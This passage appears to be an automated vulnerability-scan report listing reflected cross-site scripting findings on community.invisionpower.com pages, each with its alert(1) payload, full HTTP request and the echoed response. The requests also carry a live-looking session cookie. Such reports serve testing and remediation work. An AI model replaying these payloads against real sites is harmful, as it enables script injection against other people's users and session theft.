The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 63ba7'><script>alert(1)</script>63af09f8016 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment63ba7'><script>alert(1)</script>63af09f8016 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e4ce"-alert(1)-"bbb3000212e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment8e4ce"-alert(1)-"bbb3000212e HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... ipt type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment8e4ce"-alert(1)-"bbb3000212e"; ipb.sharelinks.title = "IP.Board 3.2.0 Dev Update: Calendar Improvements, Part I: SEO Improvements"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.26. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9eb7"-alert(1)-"47bb8743371 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?b9eb7"-alert(1)-"47bb8743371=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?b9eb7"-alert(1)-"47bb8743371=1"; ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Payment Improvements & Anti-Fraud Protection"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.27. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25d4c'><script>alert(1)</script>76947efd1fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?25d4c'><script>alert(1)</script>76947efd1fd=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4653b"-alert(1)-"8c738f7fd40 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment4653b"-alert(1)-"8c738f7fd40 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 75d7b'><script>alert(1)</script>981f0c014da was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment75d7b'><script>alert(1)</script>981f0c014da HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <a href='http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment75d7b'><script>alert(1)</script>981f0c014da?_rcid=11554#fastreply' title="Reply directly to this post" id='reply_comment_11554' class='reply_comment'> ...[SNIP]...
3.30. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2a9c"-alert(1)-"cf40b1e321c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?e2a9c"-alert(1)-"cf40b1e321c=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?e2a9c"-alert(1)-"cf40b1e321c=1"; ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Custom Customer Fields"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.31. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a23e7'><script>alert(1)</script>edfdfa2120a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?a23e7'><script>alert(1)</script>edfdfa2120a=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 96d8c'><script>alert(1)</script>195a814bc00 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment96d8c'><script>alert(1)</script>195a814bc00 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1937a"-alert(1)-"b678fb81f8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment1937a"-alert(1)-"b678fb81f8 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment1937a"-alert(1)-"b678fb81f8"; ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Custom Customer Fields"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.34. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7345'><script>alert(1)</script>8f568237069 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?a7345'><script>alert(1)</script>8f568237069=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <a href='http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?a7345'><script>alert(1)</script>8f568237069=1&_rcid=11544#fastreply' title="Reply directly to this post" id='reply_comment_11544' class='reply_comment'> ...[SNIP]...
3.35. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aed0d"-alert(1)-"5c4d62dddb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?aed0d"-alert(1)-"5c4d62dddb8=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edee4"-alert(1)-"26b08451a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcommentedee4"-alert(1)-"26b08451a HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 91bc6'><script>alert(1)</script>783674a36c7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment91bc6'><script>alert(1)</script>783674a36c7 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <a href='http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment91bc6'><script>alert(1)</script>783674a36c7?_rcid=11544#fastreply' title="Reply directly to this post" id='reply_comment_11544' class='reply_comment'> ...[SNIP]...
3.38. http://community.invisionpower.com/files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8eb36"-alert(1)-"326757020f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/?8eb36"-alert(1)-"326757020f2=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/?8eb36"-alert(1)-"326757020f2=1"; ipb.sharelinks.title = "(SOS31) Improve Next-Previous Issue links in IP.Tracker v1.0.0"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.39. http://community.invisionpower.com/files/file/3936-ipdownloads-file-version-in-support-topic-title/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 228af"-alert(1)-"3451a0f7ce6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3936-ipdownloads-file-version-in-support-topic-title/?228af"-alert(1)-"3451a0f7ce6=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3936-ipdownloads-file-version-in-support-topic-title/?228af"-alert(1)-"3451a0f7ce6=1"; ipb.sharelinks.title = "IP.Downloads file version in support topic title"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.40. http://community.invisionpower.com/files/file/3937-peace/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.invisionpower.com
Path: /files/file/3937-peace/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54fb5"-alert(1)-"94f3b1605b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3937-peace/?54fb5"-alert(1)-"94f3b1605b0=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3937-peace/?54fb5"-alert(1)-"94f3b1605b0=1"; ipb.sharelinks.title = "Peace"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.41. http://community.invisionpower.com/files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0ec7"-alert(1)-"d8405c2df0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/?c0ec7"-alert(1)-"d8405c2df0f=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/?c0ec7"-alert(1)-"d8405c2df0f=1"; ipb.sharelinks.title = "Turkish / T.rk.e Language Pack for (M31) Videos System 2.0.3 (public side)"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.42. http://community.invisionpower.com/files/file/3939-vietnamese-3xx-lang/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.invisionpower.com
Path: /files/file/3939-vietnamese-3xx-lang/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 452cc"-alert(1)-"471a521f57a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3939-vietnamese-3xx-lang/?452cc"-alert(1)-"471a521f57a=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
3.43. http://community.invisionpower.com/files/file/3940-dp31-ihost/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.invisionpower.com
Path: /files/file/3940-dp31-ihost/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7300a"-alert(1)-"a151b03b4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3940-dp31-ihost/?7300a"-alert(1)-"a151b03b4b=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3940-dp31-ihost/?7300a"-alert(1)-"a151b03b4b=1"; ipb.sharelinks.title = "(DP31) iHost"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.44. http://community.invisionpower.com/files/file/3941-vanilla-valentine/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.invisionpower.com
Path: /files/file/3941-vanilla-valentine/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18a46"-alert(1)-"12d2b2f2f27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3941-vanilla-valentine/?18a46"-alert(1)-"12d2b2f2f27=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
